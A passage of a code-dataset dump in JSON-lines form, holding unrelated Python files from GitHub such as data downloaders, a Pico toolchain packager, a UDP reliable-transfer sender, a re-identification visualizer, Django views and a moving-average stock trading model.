Org.PRIORITY[obj.priority or 1]\n due = obj.due_date and Org.DATE.format(obj.due_date.date().isoformat(),\n obj.due_date.strftime(\"%A\")[:3])\n props = {\n 'TaskID': obj.get('id'),\n 'Recurring': obj.is_recurring and 'yes' or 'no',\n }\n if obj.labels:\n props['Labels'] = ', '.join(map(str, obj.labels))\n if obj.project:\n props['Project'] = obj.project\n if obj.date_string:\n props['DateString'] = obj.date_string\n\n print('{} {} {}{}'.format(stars,\n 'DONE' if obj.checked else 'TODO',\n '[#{}] '.format(priority) if priority else '',\n obj.content))\n if due:\n print(indent + due)\n print(indent + ':PROPERTIES:')\n prop_len = max(len(val) for val in props.keys()) + 3\n for prop, value in props.items():\n prop_value = ('{:<' + str(prop_len) + '}{}').format(':{}:'.format(prop),\n value)\n print(indent + prop_value)\n print(indent + ':END:')\n\n @staticmethod\n def task_set(obj, level=1):\n name = Org.NAMES[obj.set_type].format(**obj.raw)\n if name:\n print('{} {}'.format('*' * level, name))\n for task in obj:\n Org.task(task, level=(level+1) if name else level)\n\n @staticmethod\n def result_set(obj):\n level = 1\n if obj.name:\n level = 2\n print('* ' + obj.name)\n for task_set in obj.task_sets:\n Org.task_set(task_set, level=level)\n for task in obj.tasks:\n Org.task(task, level=level)\n\nclass Alfred:\n @staticmethod\n def task(items, obj):\n item = ET.SubElement(items, 'item')\n item.set('uid', str(obj.get('id')))\n item.set('arg', str(obj.get('id')))\n\n title = ET.SubElement(item, 'title')\n title.text = obj.content\n\n @staticmethod\n def 
task_set(items, obj):\n for task in obj:\n Alfred.task(items, task)\n\n @staticmethod\n def result_set(obj):\n items = ET.Element('items')\n for task_set in obj.task_sets:\n Alfred.task_set(items, task_set)\n for task in obj.tasks:\n Alfred.task(items, task)\n ET.dump(items)\n\nformaters = {\n 'plain': Plain,\n 'org': Org,\n 'alfred': Alfred\n}\n","repo_name":"ddksr/cliist","sub_path":"lib/output.py","file_name":"output.py","file_ext":"py","file_size_in_byte":5049,"program_lang":"python","lang":"en","doc_type":"code","stars":111,"dataset":"github-code","pt":"16"} +{"seq_id":"16305965125","text":"import argparse\nimport os\nimport re\nimport zipfile\nfrom urllib.request import urlretrieve\n\nfrom bs4 import BeautifulSoup\nfrom tqdm import tqdm\n\n\nclass TqdmUpTo(tqdm):\n def update_to(self, b=1, bsize=1, tsize=None):\n if tsize is not None:\n self.total = tsize\n self.update(b * bsize - self.n)\n\n\ndef download_zip(url, output_dir, simulate):\n file_name = url.split('/')[-1]\n output_file = os.path.join(output_dir, file_name)\n\n if simulate:\n print(f'Simulating download: {url} -> {output_file}')\n return output_file\n\n with TqdmUpTo(unit='B', unit_scale=True, miniters=1, desc=file_name) as t:\n urlretrieve(url, filename=output_file, reporthook=t.update_to)\n\n return output_file\n\n\ndef unzip_file(file_path, output_dir, simulate):\n if simulate:\n print(f'Simulating unzip: {file_path}')\n return\n\n with zipfile.ZipFile(file_path, 'r') as zip_ref:\n zip_ref.extractall(output_dir)\n\n\ndef main(input_html_file, output_dir, simulate, unzip):\n with open(input_html_file, 'r') as f:\n html_content = f.read()\n\n soup = BeautifulSoup(html_content, 'html.parser')\n links = soup.find_all('a', href=True)\n\n csv_zip_links = [link['href'] for link in links if link['href'].endswith('.zip') and not link['href'].startswith('https://s3.amazonaws.com/tripdata/JC-')]\n print(f'Found {len(csv_zip_links)} zip files to download.')\n\n os.makedirs(output_dir, exist_ok=True)\n\n for url in csv_zip_links:\n downloaded_file = download_zip(url, output_dir, simulate)\n if unzip:\n unzip_file(downloaded_file, output_dir, simulate)\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Download and unzip Citibike trip data.')\n parser.add_argument('input_html_file', help='Input HTML file with links to the zip files.')\n parser.add_argument('output_dir', help='Directory to store the downloaded and unzipped files.')\n parser.add_argument('--simulate', action='store_true', help='Simulate the download and unzip process without actually downloading and unzipping the files.')\n parser.add_argument('--unzip', action='store_true', help='Unzip the downloaded files.')\n\n args = parser.parse_args()\n\n main(args.input_html_file, args.output_dir, args.simulate, args.unzip)\n","repo_name":"KranthiGV/transport-efficiency-analysis","sub_path":"scripts/citibike/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"74655691528","text":"from api.example import get_nobel_prizes\nimport asyncio\n\n\ndef main():\n \"\"\"Entry point for the application\"\"\"\n response = asyncio.run(get_nobel_prizes())\n nobel_prize_count = response[\"meta\"][\"count\"]\n print(\n f\"There are a total of {nobel_prize_count} nobel prizes award from 1901 to date, according to nobelprize.org\"\n )\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"biggestcookie/python-template","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"29224176241","text":"import torch\nimport numpy as np\nimport torch.nn.functional as F\n\nfrom config import Config\nconfig = Config()\n\n\ndef gpu_wrapper(item):\n if config.gpu:\n # print(item)\n return item.cuda()\n else:\n return item\n\n\ndef strip_eos(sents):\n return [sent[:sent.index('')] if '' in sent else sent\n for sent in sents]\n\n\ndef strip_pad(sents):\n return [sent[:sent.index('')] if '' in sent else sent\n for sent in sents]\n\n\ndef gumbel_softmax(logits, gamma, eps=1e-20):\n \"\"\" logits.shape = (..., voc_size) \"\"\"\n U = torch.zeros_like(logits).uniform_()\n G = -torch.log(-torch.log(U + eps) + eps)\n return F.softmax((logits + G) / gamma, dim=-1)\n\n\ndef pretty_string(flt):\n ret = '%.4f' % flt\n if flt > 0:\n ret = \"+\" + ret\n return ret\n\n\ndef sample_2d(probs, temperature):\n \"\"\"probs.shape = (n_batch, n_choices)\"\"\"\n if temperature != 1:\n temp = torch.exp(torch.div(torch.log(probs + 1e-20), config.temp_att)) # shape = (n_batch, 20)\n else:\n temp = probs\n sample_idx = torch.multinomial(temp, 1) # shape = (n_batch, 1)\n sample_probs = probs.gather(1, sample_idx) # shape = (n_batch, 1)\n sample_idx = sample_idx.squeeze(1) # shape = (n_batch, )\n sample_probs = sample_probs.squeeze(1) # shape = (n_batch, )\n return sample_idx, sample_probs","repo_name":"ChenWu98/Point-Then-Operate","sub_path":"PTO-amazon/utils/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"16"} +{"seq_id":"38053770458","text":"import sys\nimport urllib.request\nimport subprocess\nimport os\nimport shutil\n\nversion = sys.argv[1]\npico_url = fr\"https://github.com/raspberrypi/pico-setup-windows/releases/download/{version}/pico-setup-windows-x64-standalone.exe \"\n\n\ndef copy_file_or_folder(source, destination):\n try:\n if os.path.isfile(source):\n shutil.copy2(source, destination)\n print(f\"copy '{source}' to '{destination}'\")\n elif os.path.isdir(source):\n shutil.copytree(source, destination)\n print(f\"copy '{source}' to '{destination}'\")\n else:\n print(\"Unknown file\")\n except Exception as e:\n print(f\"error: {e}\")\n\n\ndef copy(source_folder, target_folder, file_name):\n source_path = os.path.join(source_folder, file_name)\n target_path = os.path.join(target_folder, file_name)\n\n try:\n copy_file_or_folder(source_path, target_path)\n except FileNotFoundError:\n print(f\"file not found '{file_name}' in '{source_folder}'\")\n except Exception as e:\n print(f\"error: {e}\")\n\n\ndef download_and_extract(url, extract_path):\n # 从URL中提取文件名\n file_name = os.path.basename(url)\n\n # 下载ZIP文件\n urllib.request.urlretrieve(url, file_name)\n\n # 解压ZIP文件\n subprocess.run(rf'7z x {file_name} -o{extract_path}', check=True)\n\n\n# 只需要这些就能编译,别的没用\nfile_list = [\n \"gcc-arm-none-eabi\",\n \"openocd\",\n \"pico-sdk-tools\",\n \"python\",\n \"git\",\n \"pico-examples.zip\",\n \"cmake\",\n \"ninja\",\n \"pico-env.cmd\",\n \"pico-sdk\",\n \"picotool\"\n]\n\nbuild_dir = \"temp\"\ntoolchain_dir = f\"pico-toolchain-{version}\"\n\ndownload_and_extract(pico_url, build_dir)\nos.mkdir(toolchain_dir)\nfor file in file_list:\n copy(build_dir, toolchain_dir, file)\n\n# 在每次打开bat时候,自动生成这个ini\nfix_bat = fr'''@echo off\nsetlocal\n\nset 
PICO_SDK_VERSION={version[1:]}\nset PICO_INSTALL_PATH=%~dp0\nset PICO_REG_KEY=Software\\Raspberry Pi\\Pico SDK v%PICO_SDK_VERSION%\n\nif \"%PICO_INSTALL_PATH:~-1%\"==\"\\\" (\n set \"PICO_INSTALL_PATH=%PICO_INSTALL_PATH:~0,-1%\"\n)\n\n:: generate version.ini\necho [pico-setup-windows]> %~dp0version.ini\necho PICO_SDK_VERSION=%PICO_SDK_VERSION%>> %~dp0version.ini\necho PICO_INSTALL_PATH=%PICO_INSTALL_PATH%>> %~dp0version.ini\necho PICO_REG_KEY=%PICO_REG_KEY%>> %~dp0version.ini\n\necho version.ini generated\nendlocal\n\n'''\n\nwith open(toolchain_dir + \"/pico-env.cmd\", \"r\") as f:\n original_content = f.read()\nwith open(toolchain_dir + \"/pico-env.cmd\", \"w\") as f:\n f.write(fix_bat + original_content)\n","repo_name":"liux-pro/raspberry-pi-pico-toolchain-for-windows","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2559,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"24266118785","text":"#!/usr/bin/env python\n\n# CS456 Assignment #2\n# Aaron Lau\n# 20572242\n\nfrom socket import *\nfrom struct import *\nimport sys, string, time, math, threading, signal\n\nsendBaseSeqNum = 0\neotReceived = False\nsendBuffer = []\ntimeouts = []\nwindowSize = 10\nlock = threading.Lock()\nfirstInWindow = 0\nlastInWindow = firstInWindow + windowSize -1\neotAckReceived = False\n\n## Keep track of the timeout values which are sent to the server\ndef timeoutHandler(signum, frame):\n global protocol\n global timeouts\n global windowSize\n global sendBuffer\n global lock\n global senderSocket\n global channelIP\n global channelPort\n global sendBaseSeqNum\n global firstInWindow\n global lastInWindow\n global timeout\n\n # Protocol = Go back N\n if protocol == 0:\n for index, timeoutValue in enumerate(timeouts):\n timeouts[index] = timeoutValue - 1\n if len(timeouts) > 0 and timeouts[0] <= 0:\n lock.acquire()\n while True:\n try:\n print (\"PKT SEND DAT {} {}\".format(sendBuffer[0][0]+12, sendBuffer[0][1]))\n resendPacket = sendBuffer[0][2]\n senderSocket.sendto(resendPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n timeouts[0] = timeout\n break\n except:\n pass\n lock.release()\n elif protocol == 1:\n for i in range(windowSize):\n counter = firstInWindow + i\n counter %= 256\n timeouts[counter % windowSize] = timeouts[counter % windowSize] - 1\n lock.acquire()\n if timeouts[counter % windowSize] <= 0 and sendBuffer[counter % windowSize] != None:\n while True:\n if sendBuffer[counter % windowSize] != None:\n # this try/catch is necessary for when the I/O buffer is\n try:\n print (\"PKT reSEND DAT {} {}\".format(sendBuffer[counter % windowSize][0]+12, sendBuffer[counter % windowSize][1]))\n resendPacket = sendBuffer[counter % windowSize][2]\n senderSocket.sendto(resendPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n timeouts[counter % windowSize] = timeout\n break\n except:\n pass\n else:\n break\n lock.release()\n\n\n# function that will run in another thread to wait for ACKS\ndef getACKs(senderSocket, throwaway):\n global protocol\n global timeouts\n global windowSize\n global sendBuffer\n global lock\n global sendBaseSeqNum\n global firstInWindow\n global lastInWindow\n global eotAckReceived\n\n while True:\n ackPacket, addr = senderSocket.recvfrom(4096)\n packet = unpack('!III', ackPacket)\n packetType = packet[0]\n packetLength = packet[1]\n ackNum = packet[2]\n print (\"PKT RECV ACK {} {}\".format(packetLength, ackNum))\n # Protocol = Go back N\n if protocol 
== 0:\n if packetType == 1:\n if ackNum == sendBaseSeqNum:\n lock.acquire()\n sendBuffer.pop(0)\n timeouts.pop(0)\n sendBaseSeqNum+=1\n sendBaseSeqNum%=256\n lock.release()\n elif packetType == 2:\n print (\"PKT RECV EOT {} {}\".format(packetLength, ackNum))\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n exit()\n elif protocol == 1:\n if packetType == 1:\n if ackNum == firstInWindow:\n lock.acquire()\n for i in range(firstInWindow, lastInWindow + 1):\n sendBuffer[i % windowSize] = None\n timeouts[i % windowSize] = 0\n firstInWindow+=1\n firstInWindow%=256\n lastInWindow+=1\n lastInWindow%=256\n if sendBuffer[(i + 1)% windowSize] != None:\n break\n lock.release()\n elif ackNum >= firstInWindow and ackNum <= lastInWindow:\n sendBuffer[ackNum % windowSize] = None\n timeouts[ackNum % windowSize] = 0\n elif packetType == 2:\n print (\"PKT RECV EOT {} {}\".format(packetLength, ackNum))\n signal.setitimer(signal.ITIMER_REAL, 0, 0)\n eotAckReceived = True\n exit()\n\ndef main():\n global sendBaseSeqNum\n global protocol\n global senderSocket\n global channelIP\n global channelPort\n global timeout\n global firstInWindow\n global lastInWindow\n global eotAckReceived\n # Receiver \n protocol = int(sys.argv[1])\n timeout = int(sys.argv[2]) # timeout in milliseconds\n filename = sys.argv[3]\n senderIP = \"127.0.0.1\"\n windowSize = 10\n\n senderSocket = socket(AF_INET, SOCK_DGRAM)\n senderSocket.bind((senderIP, 0))\n\n if protocol == 1:\n for i in range(windowSize):\n sendBuffer.append(None)\n timeouts.append(0)\n\n data = []\n # read channelInfo\n with open('channelInfo', 'rb') as f:\n channelInfo = f.read()\n channelIP, channelPort = channelInfo.split()\n\n print (channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")))\n # read input data\n with open(filename, 'rb') as f:\n while 1:\n datachunk = f.read(500)\n if not datachunk:\n break\n data.append(datachunk)\n\n # Start thread looking for acknowledgements\n threadForAck = threading.Thread(name=\"ACKsThread\", target=getACKs, args=(senderSocket, 0))\n threadForAck.daemon = True\n threadForAck.start()\n\n signal.signal(signal.SIGALRM, timeoutHandler)\n signal.setitimer(signal.ITIMER_REAL, 0.001, timeout*0.001)\n\n seqNum = 0\n while data != []:\n if protocol == 0:\n if len(sendBuffer) < windowSize:\n datachunk = data.pop(0)\n packet = pack('!III'+ str(len(datachunk)) +'s', 0,len(datachunk)+12,seqNum,datachunk)\n print (\"PKT SEND DAT \" + str(12 + len(datachunk)) + \" {} \".format(seqNum))\n senderSocket.sendto(packet,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n sendBuffer.append((len(datachunk),seqNum,packet))\n timeouts.append(timeout)\n seqNum += 1\n seqNum %= 256\n elif protocol == 1:\n if seqNum <= lastInWindow:\n datachunk = data.pop(0)\n packet = pack('!III'+ str(len(datachunk)) +'s', 0,len(datachunk)+12,seqNum,datachunk)\n print (\"PKT SEND DAT \" + str(12 + len(datachunk)) + \" {} \".format(seqNum))\n senderSocket.sendto(packet,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n sendBuffer[seqNum % windowSize] = (len(datachunk),seqNum,packet)\n timeouts[seqNum % windowSize] = timeout\n seqNum += 1\n seqNum %= 256\n\n if protocol == 0:\n while sendBuffer != []:\n pass\n elif protocol == 1:\n while True:\n if all(value is None for value in sendBuffer):\n break\n\n eotPacket = pack('!III', 2, 12, 0)\n print (\"PKT SEND EOT 12 0\")\n senderSocket.sendto(eotPacket,(channelIP.decode(\"utf-8\") , int(channelPort.decode(\"utf-8\")) ))\n\n while not eotAckReceived:\n pass\n\n\nif __name__ == 
'__main__':\n\tmain()\n","repo_name":"aaron-lau/networks","sub_path":"a2/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":7751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26241393945","text":"#ACTIONS\nBET = 0#\"BET\"\nCALL = 1#\"CALL\"\nCHECK = 2#\"CHECK\"\nRAISE = 3#\"RAISE\"\nFOLD = 4#\"FOLD\"\nDEAL = 5#\"DEAL\"\nPOST = 6#\"POST\"\nREFUND = 7#\"REFUND\"\nSHOW = 8#\"SHOW\"\nTIE = 9#\"TIE\"\nWIN = 10#\"WIN\"\n\nACTION_TYPES = [\"BET\", \"CALL\", \"CHECK\", \"RAISE\", \"FOLD\", \"DEAL\", \"POST\",\n \"REFUND\", \"SHOWS\", \"TIE\", \"WIN\"]\n\n#STREETS\nPREFLOP = 0\nFLOP = 1\nTURN = 2\nRIVER = 3\n\nSTREET_TYPES = [\"PREFLOP\",\"FLOP\",\"TURN\",\"RIVER\"]\n\n#PACKET TYPES\nNEWGAME = \"NEWGAME\"\nNEWHAND = \"NEWHAND\"\nGETACTION = \"GETACTION\"\nHANDOVER = \"HANDOVER\"\n\n#ACTION AMOUNT TYPES\nPOTAMOUNT = \"POT AMOUNT\"\nBETAMOUNT = \"BET AMOUNT\"\nABSAMOUNT = \"ABS AMOUNT\"\n\n#PLAYER INDICES\nME = 0\nLEFTOPP = 1\nRIGHTOPP = 2\n\nITERATIONS = 10000\n\n#EV COMPARISONS\nAWFUL = 0\nBAD = 1\nOK = 2\nGOOD = 3\nUNKNOWN = -1\n\n#BET/RAISE BINS\nBIN1 = 0\nBIN2 = 1\nBIN3 = 2\nBIN4 = 3\n","repo_name":"oliversong/pokerbots","sub_path":"StephenBot/Enums.py","file_name":"Enums.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"16"} +{"seq_id":"24178327944","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# @time:2019/6/12上午11:09\n# @Author: Yu Ci\n__all__ = ['visualize_ranked_results', 'visualize_in_pic']\n\nimport torch\nimport numpy as np\nimport os\nimport os.path as osp\nimport shutil\n# import matplotlib.pyplot as plt\n\nfrom utils.osutils import mkdir_if_missing\n\n\ndef visualize_ranked_results(distmat, queryloader, galleryloader, save_dir='', visual_id=2, topk=10):\n \"\"\"Visualizes ranked results. 
存放在一个文件夹中\n\n Supports both image-reid and video-reid.\n\n Args:\n distmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\n queryloader (tuple): tuples of (img_path(s), pid, camid).\n galleryloader (tuple): tuples of (img_path(s), pid, camid).\n save_dir (str): directory to save output images.\n visual_id(int, optional): only show 1 id\n topk (int, optional): denoting top-k images in the rank list to be visualized.\n \"\"\"\n num_q, num_g = distmat.shape\n\n print('Visualizing top-{} ranks'.format(topk))\n print('# query: {}\\n# gallery {}'.format(num_q, num_g))\n print('Saving images to \"{}\"'.format(save_dir))\n\n query = queryloader # 1980个tuple (img_path(s), pid, camid))\n gallery = galleryloader # 9330个tuple (img_path(s), pid, camid)\n assert num_q == len(query)\n assert num_g == len(gallery)\n\n indices = np.argsort(distmat, axis=1) # : (1980, 9330)\n mkdir_if_missing(save_dir) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual'\n\n def _cp_img_to(src, dst, rank, prefix):\n \"\"\"\n Args:\n src: image path or tuple (for vidreid)\n dst: target directory # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg'\n rank: int, denoting ranked position, starting from 1\n prefix: string (query or gallery)\n \"\"\"\n if isinstance(src, tuple) or isinstance(src, list): # video reid\n dst = osp.join(dst, prefix + '_top' + str(rank).zfill(3)) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg/query_top000'\n mkdir_if_missing(dst)\n for img_path in src: # 将图片copy到目标文件夹中\n shutil.copy(img_path, dst)\n else:\n dst = osp.join(dst, prefix + '_top' + str(rank).zfill(3) + '_name_' + osp.basename(src))\n shutil.copy(src, dst)\n\n for q_idx in range(num_q): # 考虑到速度等因素,只输出1个id的rank结果。这个id不是实际的行人id,是在tuple中的顺序\n if q_idx == visual_id: # 14\n qimg_path, qpid, qcamid = query[q_idx] # qpid = 16, camid = 0\n\n if isinstance(qimg_path, tuple) or isinstance(qimg_path, list): # query_dir 保存Rank结果的文件夹名称 = query的第一张图片名称\n qdir = osp.join(save_dir, osp.basename(qimg_path[0])) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual/0016C1T0006F001.jpg'\n else:\n qdir = osp.join(save_dir, osp.basename(qimg_path))\n mkdir_if_missing(qdir) # 新建这个保存rank结果的文件夹\n _cp_img_to(qimg_path, qdir, rank=0, prefix='query') # 复制query的图片到结果文件夹中\n\n rank_idx = 1\n for g_idx in indices[q_idx, :]: # 3291, 3288, 3289, 3290, 3293\n gimg_path, gpid, gcamid = gallery[g_idx]\n invalid = (qpid == gpid) & (qcamid == gcamid) # true, 排除相同cam的情况\n if not invalid:\n _cp_img_to(gimg_path, qdir, rank=rank_idx, prefix='gallery')\n rank_idx += 1\n if rank_idx > topk:\n break\n print(\"Done\")\n\n\ndef visualize_in_pic(distmat, queryloader, galleryloader, save_dir='', visual_id=2, topk=9):\n \"\"\"\n\n distmat (numpy.ndarray): distance matrix of shape (num_query, num_gallery).\n queryloader (tuple): tuples of (img_path(s), pid, camid).\n galleryloader (tuple): tuples of (img_path(s), pid, camid).\n save_dir (str): directory to save output images.\n visual_id(int, optional): only show 1 id\n topk (int, optional): denoting top-k images in the rank list to be visualized.\n \"\"\"\n num_q, num_g = distmat.shape\n\n print('Visualizing top-{} ranks'.format(topk+1))\n print('# query: {}\\n# gallery {}'.format(num_q, num_g))\n print('Saving images to \"{}\"'.format(save_dir))\n\n query = queryloader # 1980个tuple (img_path(s), pid, camid))\n gallery = galleryloader # 9330个tuple (img_path(s), pid, camid)\n assert num_q == len(query)\n assert num_g == 
len(gallery)\n\n indices = np.argsort(distmat, axis=1) # : (1980, 9330)\n mkdir_if_missing(save_dir) # '/home/ying/Desktop/mars_rank/log/debug_for_eval/split0visual'\n\n def imshow(path, title=None):\n \"\"\"Imshow for Tensor.\"\"\"\n im = plt.imread(path)\n plt.imshow(im)\n if title is not None:\n plt.title(title)\n # plt.pause(0.001) # pause a bit so that plots are updated\n flag = 0\n for q_idx in range(num_q): # 考虑到速度等因素,只输出1个id的rank结果。2,4,6,8,10..\n qimg_path, qpid, qcamid = query[q_idx] # qpid = 16, camid = 0\n\n if qpid == visual_id: # 14\n flag = 1\n fig = plt.figure(figsize=(25, 8))\n ax = plt.subplot(1, 11, 1)\n ax.axis('off')\n imshow(qimg_path[0], 'query, pid:{}'.format(qpid))\n\n rank_idx = 0\n for g_idx in indices[q_idx, :]: # 3291, 3288, 3289, 3290, 3293\n gimg_path, gpid, gcamid = gallery[g_idx]\n # invalid = (qpid == gpid) & (qcamid == gcamid) # true, 排除相同cam的情况\n invalid = False\n if not invalid:\n rank_idx += 1\n ax = plt.subplot(1, 11, rank_idx+1)\n ax.axis('off')\n imshow(gimg_path[0])\n if qpid == gpid:\n ax.set_title('rank:{},pid{}_{}'.format(rank_idx, gpid, gcamid), color='green')\n else:\n ax.set_title('rank:{},pid{}_{}'.format(rank_idx, gpid, gcamid), color='red')\n\n if rank_idx > topk:\n break\n fig.savefig(\"show_{}_{}.png\".format(qpid, qcamid))\n break\n if flag == 1:\n print(\"Done\")\n else:\n print(\"No matched person in query_dataset, try another id\")\n","repo_name":"flysnowtiger/GRL","sub_path":"reid/evaluator/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":6593,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"16"} +{"seq_id":"26981722394","text":"# -*- encoding: utf-8 -*-\nfrom django.shortcuts import render_to_response\nfrom django.template import Context, RequestContext\n\nfrom project.chercheurs.api import API\nfrom project.chercheurs.forms import ChercheurSearchForm\n\ndef liste_chercheurs(request): \n \"\"\" Liste des chercheurs \"\"\"\n search_form = ChercheurSearchForm(request.GET)\n search_form.save(commit=False)\n \n api = API(request) \n if not request.GET or request.GET.get('page') or request.GET.get('tri'):\n chercheurs = api.chercheurs_liste()\n else:\n chercheurs = api.chercheurs_recherche()\n\n if chercheurs is None:\n return render_to_response(\"chercheurs/erreur_sep_indisponible.html\", {}, RequestContext(request))\n \n sort = request.GET.get('tri')\n \n if sort is not None and sort.endswith('_desc'):\n sort = sort[:-5]\n sens = True\n else:\n sens = False\n \n \n if sort == 'nom':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.nom, reverse=sens)\n elif sort == 'etablissement':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.etablissement, reverse=sens)\n elif sort == 'pays':\n chercheurs = sorted(chercheurs, key=lambda chercheur: chercheur.pays, reverse=sens)\n \n nb_chercheurs = len(chercheurs)\n\n c = {\n 'chercheurs': chercheurs,\n 'nb_chercheurs': nb_chercheurs,\n 'search_form': search_form,\n }\n return render_to_response(\"chercheurs/liste_chercheurs.html\", Context(c), context_instance = RequestContext(request))\n\ndef chercheur(request, chercheur_id):\n \"\"\" Détails d'un chercheur \"\"\"\n api = API(request)\n chercheur = api.chercheur(chercheur_id)\n \n if not chercheur:\n return render_to_response(\"chercheurs/erreur_sep_indisponible.html\", {}, RequestContext(request))\n\n c = {\n 'chercheur': chercheur\n }\n return render_to_response(\"chercheurs/fiche.html\", Context(c), context_instance = 
RequestContext(request))\n\n","repo_name":"Abouplah/nefpy","sub_path":"project/chercheurs/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2005,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"7538528729","text":"'''\nprovide various functions to load data.\n'''\n\n# built-in\nimport os\nimport json\nimport pickle\n\n# external\nimport yaml\n\n# customs\n\n\ndef load_config(path):\n '''\n Load configs.\n This function can load different types of formats.\n The file format is determined by its extension.\n\n Args:\n path: path to the config file\n can be a single config file (str)\n or a list of config files (list[str]).\n If a list is specified, the first one is considered\n as a \"main\" config, and the other ones will overwrite the content\n of the main config.\n\n Returns:\n config (whatever dumped in a file)\n '''\n if isinstance(path, str): return load_config([path])\n assert isinstance(path, (tuple, list))\n assert path\n\n configs = list(map(_load_config_single, path))\n config = configs[0]\n for additional_conf in configs[1:]:\n config = _apply_config(config, additional_conf)\n return config\n\n\ndef _apply_config(base_config, add_config):\n '''update the content of base_config with add_config'''\n def _apply(target, dest, value):\n if '.' not in dest:\n target[dest] = value\n else:\n keys = dest.split('.')\n if keys[0] not in target: target[keys[0]] = dict()\n _apply(target[keys[0]], '.'.join(keys[1:]), value)\n return target\n\n for key, val in add_config.items():\n base_config = _apply(base_config, key, val)\n return base_config\n\n\ndef _load_config_single(path):\n '''\n Load configs.\n This function can load different types of formats.\n The file format is determined by its extension.\n\n Args:\n path: path to the config file\n\n Returns:\n config (whatever dumped in a file)\n '''\n extension = os.path.splitext(path)[1][1:]\n\n if extension == 'json':\n with open(path) as f:\n config = json.load(f)\n elif extension == 'yaml':\n with open(path) as f:\n config = yaml.safe_load(f)\n elif extension == 'pickle':\n with open(path, 'rb') as f:\n config = pickle.load(f)\n else: raise NotImplementedError(f'Unexpected extension {extension}')\n return config\n","repo_name":"yoshihikoueno/DNNCancerAnnotator","sub_path":"annotator/utils/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":2210,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"11839634382","text":"\"\"\"\n File name: movingAverage.py\n Author: Timothy Clark\n Date created: 6/26/2021\n Date last modified: 05/29/2022\n Python Version: 3.9\n\n Description: Runs a Simple Moving Average (SMA) algorithim on the stock ticker provided.\n The short term and long terma rolling means can be adjusted to create a Dual Moving\n Average (DMA) model\n\"\"\"\n\nimport alpaca_trade_api as tradeapi\nfrom alpaca_trade_api.rest import TimeFrame\nimport constants\nimport datetime\nimport numpy as np\nimport pandas as pd\n# import matplotlib.pyplot as plt\n\npd.options.mode.chained_assignment = None # default='warn'\n\n\napi = tradeapi.REST(\n constants.API_KEY,\n constants.API_SECRET_KEY,\n constants.MARKET\n)\n\ndate = datetime.datetime.now()\nstart = (date - datetime.timedelta(days=300)).strftime(\"%Y-%m-%d\")\n\ndef maModel(ticker):\n # get daily stock data for the ticker provided\n tickerdata = api.get_bars(ticker, TimeFrame.Day,start=start).df\n day = np.arange(1, len(tickerdata) + 1)\n 
tickerdata['day']= day\n\n # Calculate rolling averages per day\n tickerdata['short-term'] = tickerdata['close'].rolling(5).mean()\n tickerdata['long-term'] = tickerdata['close'].rolling(25).mean()\n\n # add a signal for buy or sell\n tickerdata['signal'] = np.where(tickerdata['short-term'] > tickerdata['long-term'], 1, 0)\n tickerdata['signal'] = np.where(tickerdata['short-term'] < tickerdata['long-term'], -1, tickerdata['signal'])\n tickerdata.dropna(inplace=True)\n\n # create a flag for when to create buy or sell transaction\n tickerdata['return'] = np.log(tickerdata['close']).diff()\n tickerdata['system_return'] = tickerdata['signal'] * tickerdata['return']\n tickerdata['transactionFlag'] = tickerdata.signal.diff()\n \n return tickerdata.loc[tickerdata.index[-1],'transactionFlag']\n\ndef maChannelModel(ticker):\n # get daily stock data for the ticker provided\n tickerdata = api.get_bars(ticker, TimeFrame.Day, limit=300).df\n day = np.arange(1, len(tickerdata) + 1)\n tickerdata['day']= day\n\n # Calculate rolling averages per day\n tickerdata['short-term'] = tickerdata['high'].rolling(10).mean()\n tickerdata['long-term'] = tickerdata['low'].rolling(10).mean()\n tickerdata['prev-close'] = tickerdata['close'].shift()\n tickerdata['prev-short'] = tickerdata['short-term'].shift()\n tickerdata['prev-long'] = tickerdata['long-term'].shift()\n \n # add a signal for buy or sell\n tickerdata['signal'] = np.where(((tickerdata['close'] > tickerdata['short-term']) & (tickerdata['prev-close'] > tickerdata['prev-short'])), 1, 0)\n tickerdata['signal'] = np.where(((tickerdata['close'] < tickerdata['long-term']) & (tickerdata['prev-close'] < tickerdata['prev-long'])), -1, tickerdata['signal'])\n 